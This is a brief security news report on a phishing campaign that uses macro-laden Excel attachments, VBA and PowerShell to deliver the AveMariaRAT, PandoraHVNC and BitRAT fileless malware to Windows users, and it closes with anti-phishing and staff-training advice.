Researchers have uncovered a new phishing campaign targeting Windows users using three different fileless malware that can steal critical information from the targeted systems.
The three fileless malware are identified as the AveMariaRAT, PandoraHVNC, and BitRAT.
The threat operators target several victims to steal usernames and passwords, screen records and exfiltrate other critical information, such as bank credentials.
The threat actors deploy a phishing message that contains a payment report sent from an authentic source that comes with a brief request message to access the attached Excel document.
Subsequently, if the target accesses the attached Excel file, the default Microsoft Excel installed on the device can raise red flags regarding the use of macros. If the device owner ignores the security concern sent by the Excel device, one of the three fileless malware will be delivered by the compromised attachment.
The attached file will contain user VBA scripts and PowerShell commands to retrieve the malware and install it on the targeted device. Furthermore, the PowerShell code will be divided into three parts for the three different malware.
On the other hand, the threat actors will utilise the VBA code to gather access to a remote HTML file using the copied “mshta[.]exe” command. The file will also include a malicious JS code that will be executed at the later stage of the malware attack.
The three fileless malware are downloaded in a large PowerShell file to bypass security detections.
The malware will be then deployed and operated by the threat actors inside the target processes by utilising the Process Hollowing strategy.
Malicious threat groups can now use three different forms of malware, indicating that these entities are incredibly focused on stealing critical information. The stolen information can allow other groups to use it as a vector for a more severe threat in the future.
Experts suggest that organisations worldwide should employ an anti-phishing solution. Additionally, it is also recommended that firms provide training for their personnel regarding identifying such threats.
